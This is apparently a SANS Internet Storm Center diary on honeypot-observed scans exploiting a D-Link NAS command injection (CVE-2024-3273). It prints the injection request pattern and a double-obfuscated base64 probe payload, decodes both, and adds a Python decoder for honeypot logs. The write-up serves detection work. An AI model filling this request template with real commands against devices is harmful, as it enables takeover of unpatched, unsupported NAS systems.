New Exploit Variation Against D-Link NAS Devices (CVE-2024-3273), (Tue, Jul 23rd)


In April, an OS command injection vulnerability in various D-Link NAS devices was made public [1]. The vulnerability, CVE-2024-3273, was exploited soon after it became public. Many of the affected devices are no longer supported.

We have seen different exploits following similar patterns:

/cgi-bin/nas_sharing.cgi?user=messagebus&passwd=&cmd=15&system=[base 64 encoded payload]

After the initial scans, we had two more "spikes" in scans for this vulnerability. The second one just started two days ago.

[Figure: graph of D-Link exploit scans between April and today]

The latest set of scans uses this payload:

ZWNobwktZQlcXHg2NVxceDYzXFx4NjhcXHg2ZlxceDIwXFx4MjdcXHg3OFxceDc4XFx4NzhcXHg3OFxceDc4XFx4NjNcXHg2M1xceDYzXFx4NjNcXHg2M1xceDI3fHNo

This payload decodes to the following (the three tokens are separated by tab characters, and each hex escape carries a doubled backslash, which the shell collapses to a single one before "echo -e" sees it):

echo	-e	\\x65\\x63\\x68\\x6f\\x20\\x27\\x78\\x78\\x78\\x78\\x78\\x63\\x63\\x63\\x63\\x63\\x27|sh

Encoding strings as hexadecimal with "echo -e" has been popular for a while and took off after Mirai started using it. In this case, the command to be executed is:

echo 'xxxxxccccc'|sh
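The two decoding steps above (base64, then the "echo -e" hex layer) are easy to automate so that a honeypot or log parser records the command that would actually run rather than the obfuscated blob. The following is an added example written for this diary, not code from the ISC or from any D-Link tooling; the request line is constructed here from the pattern and payload quoted above, and the function names (`query_param`, `decode_system_param`, `peel_echo_e`, `analyze`) are this example's own. It emulates only what the target shell and "echo -e" do to \xNN escapes; other escape forms are left untouched.

```python
"""Decode the double-obfuscated 'system' payload seen in the nas_sharing.cgi
scans: base64 -> "echo -e <\\xNN escapes> | sh" -> the command actually run."""
import base64
import binascii
import re
import shlex
from urllib.parse import unquote, urlsplit

# Constructed sample request line, modelled on the pattern in the diary; the
# payload is the base64 string quoted there.
SAMPLE_REQUEST = (
    "/cgi-bin/nas_sharing.cgi?user=messagebus&passwd=&cmd=15&system="
    "ZWNobwktZQlcXHg2NVxceDYzXFx4NjhcXHg2ZlxceDIwXFx4MjdcXHg3OFxceDc4"
    "XFx4NzhcXHg3OFxceDc4XFx4NjNcXHg2M1xceDYzXFx4NjNcXHg2M1xceDI3fHNo"
)

HEX_ESCAPE = re.compile(r"\\x([0-9a-fA-F]{2})")


def query_param(request_path, name):
    """Return one query parameter from a request path, or None.

    Split by hand rather than with parse_qs so that a '+' inside base64 is not
    turned into a space."""
    for pair in urlsplit(request_path).query.split("&"):
        key, _, value = pair.partition("=")
        if key == name:
            return unquote(value)
    return None


def decode_system_param(request_path):
    """Base64-decode the 'system' parameter; None if absent or not base64."""
    raw = query_param(request_path, "system")
    if raw is None:
        return None
    raw += "=" * (-len(raw) % 4)          # tolerate stripped padding
    try:
        return base64.b64decode(raw, validate=True).decode("latin-1")
    except (binascii.Error, ValueError):
        return None


def peel_echo_e(cmd):
    """Peel one 'echo -e <escapes> | <shell>' layer.

    Emulates what the target shell does: an unquoted doubled backslash collapses
    to a single one, then 'echo -e' turns each \\xNN into the byte 0xNN, and the
    result is fed to the command after the pipe. Returns cmd unchanged if the
    pattern does not match."""
    head, pipe, tail = cmd.partition("|")
    try:
        args = shlex.split(head)          # handles the tabs and the '\\\\' -> '\\'
    except ValueError:                    # e.g. a dangling backslash
        return cmd
    if (len(args) < 3 or args[0] != "echo"
            or not re.fullmatch(r"-[a-zA-Z]*e[a-zA-Z]*", args[1])):
        return cmd
    inner = HEX_ESCAPE.sub(lambda m: chr(int(m.group(1), 16)), " ".join(args[2:]))
    return inner + (pipe + tail if pipe else "")


def analyze(request_path):
    """Return the decoded layers for one request, plus an 'obfuscated' flag
    that a honeypot or log parser can alert on."""
    decoded = decode_system_param(request_path)
    if decoded is None:
        return None
    final = peel_echo_e(decoded)
    return {"decoded": decoded, "final": final, "obfuscated": final != decoded}


if __name__ == "__main__":
    for key, value in analyze(SAMPLE_REQUEST).items():
        print(f"{key}: {value!r}")
```

Run against the constructed request, `analyze` reports the intermediate "echo -e" form and the final `echo 'xxxxxccccc'|sh`, with `obfuscated` set because the two differ; a request whose `system` value is not valid base64 yields None rather than an exception, so the parser keeps going over the rest of a log.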

The goal of this exploit is to find vulnerable machines. The "double obfuscation" is likely supposed to bypass some filters and better discriminate against honeypots. I have seen "non functional" exploits used to detect honeypots by attempting to fingerprint the error message returned. Maybe a pattern to add to our honeypots after lunch.

The single source (192.227.190.158) scanning for this particular version of the exploit on July 19th has now switched to related scans for nas_sharing.cgi.

[1] https://nvd.nist.gov/vuln/detail/CVE-2024-3273


Johannes B. Ullrich, Ph.D., Dean of Research, SANS.edu

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.
